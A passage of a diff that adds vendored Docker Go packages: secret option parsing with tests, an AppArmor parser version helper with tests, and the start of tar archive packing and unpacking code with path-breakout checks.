"fmt" + "os" + "path/filepath" + "strconv" + "strings" + + "github.com/docker/docker/api/types" +) + +// SecretOpt is a Value type for parsing secrets +type SecretOpt struct { + values []*types.SecretRequestOption +} + +// Set a new secret value +func (o *SecretOpt) Set(value string) error { + csvReader := csv.NewReader(strings.NewReader(value)) + fields, err := csvReader.Read() + if err != nil { + return err + } + + options := &types.SecretRequestOption{ + Source: "", + Target: "", + UID: "0", + GID: "0", + Mode: 0444, + } + + // support a simple syntax of --secret foo + if len(fields) == 1 { + options.Source = fields[0] + options.Target = fields[0] + o.values = append(o.values, options) + return nil + } + + for _, field := range fields { + parts := strings.SplitN(field, "=", 2) + key := strings.ToLower(parts[0]) + + if len(parts) != 2 { + return fmt.Errorf("invalid field '%s' must be a key=value pair", field) + } + + value := parts[1] + switch key { + case "source", "src": + options.Source = value + case "target": + tDir, _ := filepath.Split(value) + if tDir != "" { + return fmt.Errorf("target must not be a path") + } + options.Target = value + case "uid": + options.UID = value + case "gid": + options.GID = value + case "mode": + m, err := strconv.ParseUint(value, 0, 32) + if err != nil { + return fmt.Errorf("invalid mode specified: %v", err) + } + + options.Mode = os.FileMode(m) + default: + if len(fields) == 1 && value == "" { + + } else { + return fmt.Errorf("invalid field in secret request: %s", key) + } + } + } + + if options.Source == "" { + return fmt.Errorf("source is required") + } + + o.values = append(o.values, options) + return nil +} + +// Type returns the type of this option +func (o *SecretOpt) Type() string { + return "secret" +} + +// String returns a string repr of this option +func (o *SecretOpt) String() string { + secrets := []string{} + for _, secret := range o.values { + repr := fmt.Sprintf("%s -> %s", secret.Source, secret.Target) + 
secrets = append(secrets, repr) + } + return strings.Join(secrets, ", ") +} + +// Value returns the secret requests +func (o *SecretOpt) Value() []*types.SecretRequestOption { + return o.values +} diff --git a/vendor/github.com/docker/docker/opts/secret_test.go b/vendor/github.com/docker/docker/opts/secret_test.go new file mode 100644 index 0000000000..d978c86e22 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/secret_test.go @@ -0,0 +1,79 @@ +package opts + +import ( + "os" + "testing" + + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestSecretOptionsSimple(t *testing.T) { + var opt SecretOpt + + testCase := "app-secret" + assert.NilError(t, opt.Set(testCase)) + + reqs := opt.Value() + assert.Equal(t, len(reqs), 1) + req := reqs[0] + assert.Equal(t, req.Source, "app-secret") + assert.Equal(t, req.Target, "app-secret") + assert.Equal(t, req.UID, "0") + assert.Equal(t, req.GID, "0") +} + +func TestSecretOptionsSourceTarget(t *testing.T) { + var opt SecretOpt + + testCase := "source=foo,target=testing" + assert.NilError(t, opt.Set(testCase)) + + reqs := opt.Value() + assert.Equal(t, len(reqs), 1) + req := reqs[0] + assert.Equal(t, req.Source, "foo") + assert.Equal(t, req.Target, "testing") +} + +func TestSecretOptionsShorthand(t *testing.T) { + var opt SecretOpt + + testCase := "src=foo,target=testing" + assert.NilError(t, opt.Set(testCase)) + + reqs := opt.Value() + assert.Equal(t, len(reqs), 1) + req := reqs[0] + assert.Equal(t, req.Source, "foo") +} + +func TestSecretOptionsCustomUidGid(t *testing.T) { + var opt SecretOpt + + testCase := "source=foo,target=testing,uid=1000,gid=1001" + assert.NilError(t, opt.Set(testCase)) + + reqs := opt.Value() + assert.Equal(t, len(reqs), 1) + req := reqs[0] + assert.Equal(t, req.Source, "foo") + assert.Equal(t, req.Target, "testing") + assert.Equal(t, req.UID, "1000") + assert.Equal(t, req.GID, "1001") +} + +func TestSecretOptionsCustomMode(t *testing.T) { + var opt SecretOpt + + testCase := 
"source=foo,target=testing,uid=1000,gid=1001,mode=0444" + assert.NilError(t, opt.Set(testCase)) + + reqs := opt.Value() + assert.Equal(t, len(reqs), 1) + req := reqs[0] + assert.Equal(t, req.Source, "foo") + assert.Equal(t, req.Target, "testing") + assert.Equal(t, req.UID, "1000") + assert.Equal(t, req.GID, "1001") + assert.Equal(t, req.Mode, os.FileMode(0444)) +} diff --git a/vendor/github.com/docker/docker/pkg/README.md b/vendor/github.com/docker/docker/pkg/README.md new file mode 100644 index 0000000000..c4b78a8ad8 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/README.md @@ -0,0 +1,11 @@ +pkg/ is a collection of utility packages used by the Docker project without being specific to its internals. + +Utility packages are kept separate from the docker core codebase to keep it as small and concise as possible. +If some utilities grow larger and their APIs stabilize, they may be moved to their own repository under the +Docker organization, to facilitate re-use by other projects. However that is not the priority. + +The directory `pkg` is named after the same directory in the camlistore project. Since Brad is a core +Go maintainer, we thought it made sense to copy his methods for organizing Go code :) Thanks Brad! + +Because utility packages are small and neatly separated from the rest of the codebase, they are a good +place to start for aspiring maintainers and contributors. Get in touch if you want to help maintain them! diff --git a/vendor/github.com/docker/docker/pkg/aaparser/aaparser.go b/vendor/github.com/docker/docker/pkg/aaparser/aaparser.go new file mode 100644 index 0000000000..ffcc5647a9 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/aaparser/aaparser.go @@ -0,0 +1,91 @@ +// Package aaparser is a convenience package interacting with `apparmor_parser`. 
+package aaparser + +import ( + "fmt" + "os/exec" + "strconv" + "strings" +) + +const ( + binary = "apparmor_parser" +) + +// GetVersion returns the major and minor version of apparmor_parser. +func GetVersion() (int, error) { + output, err := cmd("", "--version") + if err != nil { + return -1, err + } + + return parseVersion(output) +} + +// LoadProfile runs `apparmor_parser -r` on a specified apparmor profile to +// replace the profile. +func LoadProfile(profilePath string) error { + _, err := cmd("", "-r", profilePath) + if err != nil { + return err + } + return nil +} + +// cmd runs `apparmor_parser` with the passed arguments. +func cmd(dir string, arg ...string) (string, error) { + c := exec.Command(binary, arg...) + c.Dir = dir + + output, err := c.CombinedOutput() + if err != nil { + return "", fmt.Errorf("running `%s %s` failed with output: %s\nerror: %v", c.Path, strings.Join(c.Args, " "), string(output), err) + } + + return string(output), nil +} + +// parseVersion takes the output from `apparmor_parser --version` and returns +// a representation of the {major, minor, patch} version as a single number of +// the form MMmmPPP {major, minor, patch}. +func parseVersion(output string) (int, error) { + // output is in the form of the following: + // AppArmor parser version 2.9.1 + // Copyright (C) 1999-2008 Novell Inc. + // Copyright 2009-2012 Canonical Ltd. + + lines := strings.SplitN(output, "\n", 2) + words := strings.Split(lines[0], " ") + version := words[len(words)-1] + + // split by major minor version + v := strings.Split(version, ".") + if len(v) == 0 || len(v) > 3 { + return -1, fmt.Errorf("parsing version failed for output: `%s`", output) + } + + // Default the versions to 0. 
+ var majorVersion, minorVersion, patchLevel int + + majorVersion, err := strconv.Atoi(v[0]) + if err != nil { + return -1, err + } + + if len(v) > 1 { + minorVersion, err = strconv.Atoi(v[1]) + if err != nil { + return -1, err + } + } + if len(v) > 2 { + patchLevel, err = strconv.Atoi(v[2]) + if err != nil { + return -1, err + } + } + + // major*10^5 + minor*10^3 + patch*10^0 + numericVersion := majorVersion*1e5 + minorVersion*1e3 + patchLevel + return numericVersion, nil +} diff --git a/vendor/github.com/docker/docker/pkg/aaparser/aaparser_test.go b/vendor/github.com/docker/docker/pkg/aaparser/aaparser_test.go new file mode 100644 index 0000000000..69bc8d2fd8 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/aaparser/aaparser_test.go @@ -0,0 +1,73 @@ +package aaparser + +import ( + "testing" +) + +type versionExpected struct { + output string + version int +} + +func TestParseVersion(t *testing.T) { + versions := []versionExpected{ + { + output: `AppArmor parser version 2.10 +Copyright (C) 1999-2008 Novell Inc. +Copyright 2009-2012 Canonical Ltd. + +`, + version: 210000, + }, + { + output: `AppArmor parser version 2.8 +Copyright (C) 1999-2008 Novell Inc. +Copyright 2009-2012 Canonical Ltd. + +`, + version: 208000, + }, + { + output: `AppArmor parser version 2.20 +Copyright (C) 1999-2008 Novell Inc. +Copyright 2009-2012 Canonical Ltd. + +`, + version: 220000, + }, + { + output: `AppArmor parser version 2.05 +Copyright (C) 1999-2008 Novell Inc. +Copyright 2009-2012 Canonical Ltd. + +`, + version: 205000, + }, + { + output: `AppArmor parser version 2.9.95 +Copyright (C) 1999-2008 Novell Inc. +Copyright 2009-2012 Canonical Ltd. + +`, + version: 209095, + }, + { + output: `AppArmor parser version 3.14.159 +Copyright (C) 1999-2008 Novell Inc. +Copyright 2009-2012 Canonical Ltd. 
+ +`, + version: 314159, + }, + } + + for _, v := range versions { + version, err := parseVersion(v.output) + if err != nil { + t.Fatalf("expected error to be nil for %#v, got: %v", v, err) + } + if version != v.version { + t.Fatalf("expected version to be %d, was %d, for: %#v\n", v.version, version, v) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/archive/README.md b/vendor/github.com/docker/docker/pkg/archive/README.md new file mode 100644 index 0000000000..7307d9694f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/README.md @@ -0,0 +1 @@ +This code provides helper functions for dealing with archive files. diff --git a/vendor/github.com/docker/docker/pkg/archive/archive.go b/vendor/github.com/docker/docker/pkg/archive/archive.go new file mode 100644 index 0000000000..3261c4f498 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/archive.go @@ -0,0 +1,1175 @@ +package archive + +import ( + "archive/tar" + "bufio" + "bytes" + "compress/bzip2" + "compress/gzip" + "errors" + "fmt" + "io" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "runtime" + "strings" + "syscall" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/fileutils" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/pools" + "github.com/docker/docker/pkg/promise" + "github.com/docker/docker/pkg/system" +) + +type ( + // Compression is the state represents if compressed or not. + Compression int + // WhiteoutFormat is the format of whiteouts unpacked + WhiteoutFormat int + // TarChownOptions wraps the chown options UID and GID. + TarChownOptions struct { + UID, GID int + } + + // TarOptions wraps the tar options. 
+ TarOptions struct { + IncludeFiles []string + ExcludePatterns []string + Compression Compression + NoLchown bool + UIDMaps []idtools.IDMap + GIDMaps []idtools.IDMap + ChownOpts *TarChownOptions + IncludeSourceDir bool + // WhiteoutFormat is the expected on disk format for whiteout files. + // This format will be converted to the standard format on pack + // and from the standard format on unpack. + WhiteoutFormat WhiteoutFormat + // When unpacking, specifies whether overwriting a directory with a + // non-directory is allowed and vice versa. + NoOverwriteDirNonDir bool + // For each include when creating an archive, the included name will be + // replaced with the matching name from this map. + RebaseNames map[string]string + InUserNS bool + } + + // Archiver allows the reuse of most utility functions of this package + // with a pluggable Untar function. Also, to facilitate the passing of + // specific id mappings for untar, an archiver can be created with maps + // which will then be passed to Untar operations + Archiver struct { + Untar func(io.Reader, string, *TarOptions) error + UIDMaps []idtools.IDMap + GIDMaps []idtools.IDMap + } + + // breakoutError is used to differentiate errors related to breaking out + // When testing archive breakout in the unit tests, this error is expected + // in order for the test to pass. + breakoutError error +) + +var ( + // ErrNotImplemented is the error message of function not implemented. + ErrNotImplemented = errors.New("Function not implemented") + defaultArchiver = &Archiver{Untar: Untar, UIDMaps: nil, GIDMaps: nil} +) + +const ( + // HeaderSize is the size in bytes of a tar header + HeaderSize = 512 +) + +const ( + // Uncompressed represents the uncompressed. + Uncompressed Compression = iota + // Bzip2 is bzip2 compression algorithm. + Bzip2 + // Gzip is gzip compression algorithm. + Gzip + // Xz is xz compression algorithm. 
+ Xz +) + +const ( + // AUFSWhiteoutFormat is the default format for whiteouts + AUFSWhiteoutFormat WhiteoutFormat = iota + // OverlayWhiteoutFormat formats whiteout according to the overlay + // standard. + OverlayWhiteoutFormat +) + +// IsArchive checks for the magic bytes of a tar or any supported compression +// algorithm. +func IsArchive(header []byte) bool { + compression := DetectCompression(header) + if compression != Uncompressed { + return true + } + r := tar.NewReader(bytes.NewBuffer(header)) + _, err := r.Next() + return err == nil +} + +// IsArchivePath checks if the (possibly compressed) file at the given path +// starts with a tar file header. +func IsArchivePath(path string) bool { + file, err := os.Open(path) + if err != nil { + return false + } + defer file.Close() + rdr, err := DecompressStream(file) + if err != nil { + return false + } + r := tar.NewReader(rdr) + _, err = r.Next() + return err == nil +} + +// DetectCompression detects the compression algorithm of the source. +func DetectCompression(source []byte) Compression { + for compression, m := range map[Compression][]byte{ + Bzip2: {0x42, 0x5A, 0x68}, + Gzip: {0x1F, 0x8B, 0x08}, + Xz: {0xFD, 0x37, 0x7A, 0x58, 0x5A, 0x00}, + } { + if len(source) < len(m) { + logrus.Debug("Len too short") + continue + } + if bytes.Compare(m, source[:len(m)]) == 0 { + return compression + } + } + return Uncompressed +} + +func xzDecompress(archive io.Reader) (io.ReadCloser, <-chan struct{}, error) { + args := []string{"xz", "-d", "-c", "-q"} + + return cmdStream(exec.Command(args[0], args[1:]...), archive) +} + +// DecompressStream decompresses the archive and returns a ReaderCloser with the decompressed archive. 
+func DecompressStream(archive io.Reader) (io.ReadCloser, error) { + p := pools.BufioReader32KPool + buf := p.Get(archive) + bs, err := buf.Peek(10) + if err != nil && err != io.EOF { + // Note: we'll ignore any io.EOF error because there are some odd + // cases where the layer.tar file will be empty (zero bytes) and + // that results in an io.EOF from the Peek() call. So, in those + // cases we'll just treat it as a non-compressed stream and + // that means just create an empty layer. + // See Issue 18170 + return nil, err + } + + compression := DetectCompression(bs) + switch compression { + case Uncompressed: + readBufWrapper := p.NewReadCloserWrapper(buf, buf) + return readBufWrapper, nil + case Gzip: + gzReader, err := gzip.NewReader(buf) + if err != nil { + return nil, err + } + readBufWrapper := p.NewReadCloserWrapper(buf, gzReader) + return readBufWrapper, nil + case Bzip2: + bz2Reader := bzip2.NewReader(buf) + readBufWrapper := p.NewReadCloserWrapper(buf, bz2Reader) + return readBufWrapper, nil + case Xz: + xzReader, chdone, err := xzDecompress(buf) + if err != nil { + return nil, err + } + readBufWrapper := p.NewReadCloserWrapper(buf, xzReader) + return ioutils.NewReadCloserWrapper(readBufWrapper, func() error { + <-chdone + return readBufWrapper.Close() + }), nil + default: + return nil, fmt.Errorf("Unsupported compression format %s", (&compression).Extension()) + } +} + +// CompressStream compresseses the dest with specified compression algorithm. 
+func CompressStream(dest io.Writer, compression Compression) (io.WriteCloser, error) { + p := pools.BufioWriter32KPool + buf := p.Get(dest) + switch compression { + case Uncompressed: + writeBufWrapper := p.NewWriteCloserWrapper(buf, buf) + return writeBufWrapper, nil + case Gzip: + gzWriter := gzip.NewWriter(dest) + writeBufWrapper := p.NewWriteCloserWrapper(buf, gzWriter) + return writeBufWrapper, nil + case Bzip2, Xz: + // archive/bzip2 does not support writing, and there is no xz support at all + // However, this is not a problem as docker only currently generates gzipped tars + return nil, fmt.Errorf("Unsupported compression format %s", (&compression).Extension()) + default: + return nil, fmt.Errorf("Unsupported compression format %s", (&compression).Extension()) + } +} + +// Extension returns the extension of a file that uses the specified compression algorithm. +func (compression *Compression) Extension() string { + switch *compression { + case Uncompressed: + return "tar" + case Bzip2: + return "tar.bz2" + case Gzip: + return "tar.gz" + case Xz: + return "tar.xz" + } + return "" +} + +type tarWhiteoutConverter interface { + ConvertWrite(*tar.Header, string, os.FileInfo) (*tar.Header, error) + ConvertRead(*tar.Header, string) (bool, error) +} + +type tarAppender struct { + TarWriter *tar.Writer + Buffer *bufio.Writer + + // for hardlink mapping + SeenFiles map[uint64]string + UIDMaps []idtools.IDMap + GIDMaps []idtools.IDMap + + // For packing and unpacking whiteout files in the + // non standard format. The whiteout files defined + // by the AUFS standard are used as the tar whiteout + // standard. + WhiteoutConverter tarWhiteoutConverter +} + +// canonicalTarName provides a platform-independent and consistent posix-style +//path for files and directories to be archived regardless of the platform. 
+func canonicalTarName(name string, isDir bool) (string, error) { + name, err := CanonicalTarNameForPath(name) + if err != nil { + return "", err + } + + // suffix with '/' for directories + if isDir && !strings.HasSuffix(name, "/") { + name += "/" + } + return name, nil +} + +// addTarFile adds to the tar archive a file from `path` as `name` +func (ta *tarAppender) addTarFile(path, name string) error { + fi, err := os.Lstat(path) + if err != nil { + return err + } + + link := "" + if fi.Mode()&os.ModeSymlink != 0 { + if link, err = os.Readlink(path); err != nil { + return err + } + } + + hdr, err := tar.FileInfoHeader(fi, link) + if err != nil { + return err + } + hdr.Mode = int64(chmodTarEntry(os.FileMode(hdr.Mode))) + + name, err = canonicalTarName(name, fi.IsDir()) + if err != nil { + return fmt.Errorf("tar: cannot canonicalize path: %v", err) + } + hdr.Name = name + + inode, err := setHeaderForSpecialDevice(hdr, ta, name, fi.Sys()) + if err != nil { + return err + } + + // if it's not a directory and has more than 1 link, + // it's hard linked, so set the type flag accordingly + if !fi.IsDir() && hasHardlinks(fi) { + // a link should have a name that it links too + // and that linked name should be first in the tar archive + if oldpath, ok := ta.SeenFiles[inode]; ok { + hdr.Typeflag = tar.TypeLink + hdr.Linkname = oldpath + hdr.Size = 0 // This Must be here for the writer math to add up! + } else { + ta.SeenFiles[inode] = name + } + } + + capability, _ := system.Lgetxattr(path, "security.capability") + if capability != nil { + hdr.Xattrs = make(map[string]string) + hdr.Xattrs["security.capability"] = string(capability) + } + + //handle re-mapping container ID mappings back to host ID mappings before + //writing tar headers/files. 
We skip whiteout files because they were written + //by the kernel and already have proper ownership relative to the host + if !strings.HasPrefix(filepath.Base(hdr.Name), WhiteoutPrefix) && (ta.UIDMaps != nil || ta.GIDMaps != nil) { + uid, gid, err := getFileUIDGID(fi.Sys()) + if err != nil { + return err + } + xUID, err := idtools.ToContainer(uid, ta.UIDMaps) + if err != nil { + return err + } + xGID, err := idtools.ToContainer(gid, ta.GIDMaps) + if err != nil { + return err + } + hdr.Uid = xUID + hdr.Gid = xGID + } + + if ta.WhiteoutConverter != nil { + wo, err := ta.WhiteoutConverter.ConvertWrite(hdr, path, fi) + if err != nil { + return err + } + + // If a new whiteout file exists, write original hdr, then + // replace hdr with wo to be written after. Whiteouts should + // always be written after the original. Note the original + // hdr may have been updated to be a whiteout with returning + // a whiteout header + if wo != nil { + if err := ta.TarWriter.WriteHeader(hdr); err != nil { + return err + } + if hdr.Typeflag == tar.TypeReg && hdr.Size > 0 { + return fmt.Errorf("tar: cannot use whiteout for non-empty file") + } + hdr = wo + } + } + + if err := ta.TarWriter.WriteHeader(hdr); err != nil { + return err + } + + if hdr.Typeflag == tar.TypeReg && hdr.Size > 0 { + // We use system.OpenSequential to ensure we use sequential file + // access on Windows to avoid depleting the standby list. + // On Linux, this equates to a regular os.Open. 
+ file, err := system.OpenSequential(path) + if err != nil { + return err + } + + ta.Buffer.Reset(ta.TarWriter) + defer ta.Buffer.Reset(nil) + _, err = io.Copy(ta.Buffer, file) + file.Close() + if err != nil { + return err + } + err = ta.Buffer.Flush() + if err != nil { + return err + } + } + + return nil +} + +func createTarFile(path, extractDir string, hdr *tar.Header, reader io.Reader, Lchown bool, chownOpts *TarChownOptions, inUserns bool) error { + // hdr.Mode is in linux format, which we can use for sycalls, + // but for os.Foo() calls we need the mode converted to os.FileMode, + // so use hdrInfo.Mode() (they differ for e.g. setuid bits) + hdrInfo := hdr.FileInfo() + + switch hdr.Typeflag { + case tar.TypeDir: + // Create directory unless it exists as a directory already. + // In that case we just want to merge the two + if fi, err := os.Lstat(path); !(err == nil && fi.IsDir()) { + if err := os.Mkdir(path, hdrInfo.Mode()); err != nil { + return err + } + } + + case tar.TypeReg, tar.TypeRegA: + // Source is regular file. We use system.OpenFileSequential to use sequential + // file access to avoid depleting the standby list on Windows. 
+ // On Linux, this equates to a regular os.OpenFile + file, err := system.OpenFileSequential(path, os.O_CREATE|os.O_WRONLY, hdrInfo.Mode()) + if err != nil { + return err + } + if _, err := io.Copy(file, reader); err != nil { + file.Close() + return err + } + file.Close() + + case tar.TypeBlock, tar.TypeChar: + if inUserns { // cannot create devices in a userns + return nil + } + // Handle this is an OS-specific way + if err := handleTarTypeBlockCharFifo(hdr, path); err != nil { + return err + } + + case tar.TypeFifo: + // Handle this is an OS-specific way + if err := handleTarTypeBlockCharFifo(hdr, path); err != nil { + return err + } + + case tar.TypeLink: + targetPath := filepath.Join(extractDir, hdr.Linkname) + // check for hardlink breakout + if !strings.HasPrefix(targetPath, extractDir) { + return breakoutError(fmt.Errorf("invalid hardlink %q -> %q", targetPath, hdr.Linkname)) + } + if err := os.Link(targetPath, path); err != nil { + return err + } + + case tar.TypeSymlink: + // path -> hdr.Linkname = targetPath + // e.g. /extractDir/path/to/symlink -> ../2/file = /extractDir/path/2/file + targetPath := filepath.Join(filepath.Dir(path), hdr.Linkname) + + // the reason we don't need to check symlinks in the path (with FollowSymlinkInScope) is because + // that symlink would first have to be created, which would be caught earlier, at this very check: + if !strings.HasPrefix(targetPath, extractDir) { + return breakoutError(fmt.Errorf("invalid symlink %q -> %q", path, hdr.Linkname)) + } + if err := os.Symlink(hdr.Linkname, path); err != nil { + return err + } + + case tar.TypeXGlobalHeader: + logrus.Debug("PAX Global Extended Headers found and ignored") + return nil + + default: + return fmt.Errorf("Unhandled tar header type %d\n", hdr.Typeflag) + } + + // Lchown is not supported on Windows. 
+ if Lchown && runtime.GOOS != "windows" { + if chownOpts == nil { + chownOpts = &TarChownOptions{UID: hdr.Uid, GID: hdr.Gid} + } + if err := os.Lchown(path, chownOpts.UID, chownOpts.GID); err != nil { + return err + } + } + + var errors []string + for key, value := range hdr.Xattrs { + if err := system.Lsetxattr(path, key, []byte(value), 0); err != nil { + if err == syscall.ENOTSUP { + // We ignore errors here because not all graphdrivers support + // xattrs *cough* old versions of AUFS *cough*. However only + // ENOTSUP should be emitted in that case, otherwise we still + // bail. + errors = append(errors, err.Error()) + continue + } + return err + } + + } + + if len(errors) > 0 { + logrus.WithFields(logrus.Fields{ + "errors": errors, + }).Warn("ignored xattrs in archive: underlying filesystem doesn't support them") + } + + // There is no LChmod, so ignore mode for symlink. Also, this + // must happen after chown, as that can modify the file mode + if err := handleLChmod(hdr, path, hdrInfo); err != nil { + return err + } + + aTime := hdr.AccessTime + if aTime.Before(hdr.ModTime) { + // Last access time should never be before last modified time. + aTime = hdr.ModTime + } + + // system.Chtimes doesn't support a NOFOLLOW flag atm + if hdr.Typeflag == tar.TypeLink { + if fi, err := os.Lstat(hdr.Linkname); err == nil && (fi.Mode()&os.ModeSymlink == 0) { + if err := system.Chtimes(path, aTime, hdr.ModTime); err != nil { + return err + } + } + } else if hdr.Typeflag != tar.TypeSymlink { + if err := system.Chtimes(path, aTime, hdr.ModTime); err != nil { + return err + } + } else { + ts := []syscall.Timespec{timeToTimespec(aTime), timeToTimespec(hdr.ModTime)} + if err := system.LUtimesNano(path, ts); err != nil && err != system.ErrNotSupportedPlatform { + return err + } + } + return nil +} + +// Tar creates an archive from the directory at `path`, and returns it as a +// stream of bytes. 
+func Tar(path string, compression Compression) (io.ReadCloser, error) { + return TarWithOptions(path, &TarOptions{Compression: compression}) +} + +// TarWithOptions creates an archive from the directory at `path`, only including files whose relative +// paths are included in `options.IncludeFiles` (if non-nil) or not in `options.ExcludePatterns`. +func TarWithOptions(srcPath string, options *TarOptions) (io.ReadCloser, error) { + + // Fix the source path to work with long path names. This is a no-op + // on platforms other than Windows. + srcPath = fixVolumePathPrefix(srcPath) + + patterns, patDirs, exceptions, err := fileutils.CleanPatterns(options.ExcludePatterns) + + if err != nil { + return nil, err + } + + pipeReader, pipeWriter := io.Pipe() + + compressWriter, err := CompressStream(pipeWriter, options.Compression) + if err != nil { + return nil, err + } + + go func() { + ta := &tarAppender{ + TarWriter: tar.NewWriter(compressWriter), + Buffer: pools.BufioWriter32KPool.Get(nil), + SeenFiles: make(map[uint64]string), + UIDMaps: options.UIDMaps, + GIDMaps: options.GIDMaps, + WhiteoutConverter: getWhiteoutConverter(options.WhiteoutFormat), + } + + defer func() { + // Make sure to check the error on Close. + if err := ta.TarWriter.Close(); err != nil { + logrus.Errorf("Can't close tar writer: %s", err) + } + if err := compressWriter.Close(); err != nil { + logrus.Errorf("Can't close compress writer: %s", err) + } + if err := pipeWriter.Close(); err != nil { + logrus.Errorf("Can't close pipe writer: %s", err) + } + }() + + // this buffer is needed for the duration of this piped stream + defer pools.BufioWriter32KPool.Put(ta.Buffer) + + // In general we log errors here but ignore them because + // during e.g. 
a diff operation the container can continue + // mutating the filesystem and we can see transient errors + // from this + + stat, err := os.Lstat(srcPath) + if err != nil { + return + } + + if !stat.IsDir() { + // We can't later join a non-dir with any includes because the + // 'walk' will error if "file/." is stat-ed and "file" is not a + // directory. So, we must split the source path and use the + // basename as the include. + if len(options.IncludeFiles) > 0 { + logrus.Warn("Tar: Can't archive a file with includes") + } + + dir, base := SplitPathDirEntry(srcPath) + srcPath = dir + options.IncludeFiles = []string{base} + } + + if len(options.IncludeFiles) == 0 { + options.IncludeFiles = []string{"."} + } + + seen := make(map[string]bool) + + for _, include := range options.IncludeFiles { + rebaseName := options.RebaseNames[include] + + walkRoot := getWalkRoot(srcPath, include) + filepath.Walk(walkRoot, func(filePath string, f os.FileInfo, err error) error { + if err != nil { + logrus.Errorf("Tar: Can't stat file %s to tar: %s", srcPath, err) + return nil + } + + relFilePath, err := filepath.Rel(srcPath, filePath) + if err != nil || (!options.IncludeSourceDir && relFilePath == "." && f.IsDir()) { + // Error getting relative path OR we are looking + // at the source directory path. Skip in both situations. + return nil + } + + if options.IncludeSourceDir && include == "." && relFilePath != "." { + relFilePath = strings.Join([]string{".", relFilePath}, string(filepath.Separator)) + } + + skip := false + + // If "include" is an exact match for the current file + // then even if there's an "excludePatterns" pattern that + // matches it, don't skip it. 
IOW, assume an explicit 'include' + // is asking for that file no matter what - which is true + // for some files, like .dockerignore and Dockerfile (sometimes) + if include != relFilePath { + skip, err = fileutils.OptimizedMatches(relFilePath, patterns, patDirs) + if err != nil { + logrus.Errorf("Error matching %s: %v", relFilePath, err) + return err + } + } + + if skip { + // If we want to skip this file and its a directory + // then we should first check to see if there's an + // excludes pattern (eg !dir/file) that starts with this + // dir. If so then we can't skip this dir. + + // Its not a dir then so we can just return/skip. + if !f.IsDir() { + return nil + } + + // No exceptions (!...) in patterns so just skip dir + if !exceptions { + return filepath.SkipDir + } + + dirSlash := relFilePath + string(filepath.Separator) + + for _, pat := range patterns { + if pat[0] != '!' { + continue + } + pat = pat[1:] + string(filepath.Separator) + if strings.HasPrefix(pat, dirSlash) { + // found a match - so can't skip this dir + return nil + } + } + + // No matching exclusion dir so just skip dir + return filepath.SkipDir + } + + if seen[relFilePath] { + return nil + } + seen[relFilePath] = true + + // Rename the base resource. + if rebaseName != "" { + var replacement string + if rebaseName != string(filepath.Separator) { + // Special case the root directory to replace with an + // empty string instead so that we don't end up with + // double slashes in the paths. + replacement = rebaseName + } + + relFilePath = strings.Replace(relFilePath, include, replacement, 1) + } + + if err := ta.addTarFile(filePath, relFilePath); err != nil { + logrus.Errorf("Can't add file %s to tar: %s", filePath, err) + // if pipe is broken, stop writing tar stream to it + if err == io.ErrClosedPipe { + return err + } + } + return nil + }) + } + }() + + return pipeReader, nil +} + +// Unpack unpacks the decompressedArchive to dest with options. 
+func Unpack(decompressedArchive io.Reader, dest string, options *TarOptions) error { + tr := tar.NewReader(decompressedArchive) + trBuf := pools.BufioReader32KPool.Get(nil) + defer pools.BufioReader32KPool.Put(trBuf) + + var dirs []*tar.Header + remappedRootUID, remappedRootGID, err := idtools.GetRootUIDGID(options.UIDMaps, options.GIDMaps) + if err != nil { + return err + } + whiteoutConverter := getWhiteoutConverter(options.WhiteoutFormat) + + // Iterate through the files in the archive. +loop: + for { + hdr, err := tr.Next() + if err == io.EOF { + // end of tar archive + break + } + if err != nil { + return err + } + + // Normalize name, for safety and for a simple is-root check + // This keeps "../" as-is, but normalizes "/../" to "/". Or Windows: + // This keeps "..\" as-is, but normalizes "\..\" to "\". + hdr.Name = filepath.Clean(hdr.Name) + + for _, exclude := range options.ExcludePatterns { + if strings.HasPrefix(hdr.Name, exclude) { + continue loop + } + } + + // After calling filepath.Clean(hdr.Name) above, hdr.Name will now be in + // the filepath format for the OS on which the daemon is running. Hence + // the check for a slash-suffix MUST be done in an OS-agnostic way. 
+ if !strings.HasSuffix(hdr.Name, string(os.PathSeparator)) { + // Not the root directory, ensure that the parent directory exists + parent := filepath.Dir(hdr.Name) + parentPath := filepath.Join(dest, parent) + if _, err := os.Lstat(parentPath); err != nil && os.IsNotExist(err) { + err = idtools.MkdirAllNewAs(parentPath, 0777, remappedRootUID, remappedRootGID) + if err != nil { + return err + } + } + } + + path := filepath.Join(dest, hdr.Name) + rel, err := filepath.Rel(dest, path) + if err != nil { + return err + } + if strings.HasPrefix(rel, ".."+string(os.PathSeparator)) { + return breakoutError(fmt.Errorf("%q is outside of %q", hdr.Name, dest)) + } + + // If path exits we almost always just want to remove and replace it + // The only exception is when it is a directory *and* the file from + // the layer is also a directory. Then we want to merge them (i.e. + // just apply the metadata from the layer). + if fi, err := os.Lstat(path); err == nil { + if options.NoOverwriteDirNonDir && fi.IsDir() && hdr.Typeflag != tar.TypeDir { + // If NoOverwriteDirNonDir is true then we cannot replace + // an existing directory with a non-directory from the archive. + return fmt.Errorf("cannot overwrite directory %q with non-directory %q", path, dest) + } + + if options.NoOverwriteDirNonDir && !fi.IsDir() && hdr.Typeflag == tar.TypeDir { + // If NoOverwriteDirNonDir is true then we cannot replace + // an existing non-directory with a directory from the archive. + return fmt.Errorf("cannot overwrite non-directory %q with directory %q", path, dest) + } + + if fi.IsDir() && hdr.Name == "." { + continue + } + + if !(fi.IsDir() && hdr.Typeflag == tar.TypeDir) { + if err := os.RemoveAll(path); err != nil { + return err + } + } + } + trBuf.Reset(tr) + + // if the options contain a uid & gid maps, convert header uid/gid + // entries using the maps such that lchown sets the proper mapped + // uid/gid after writing the file. 
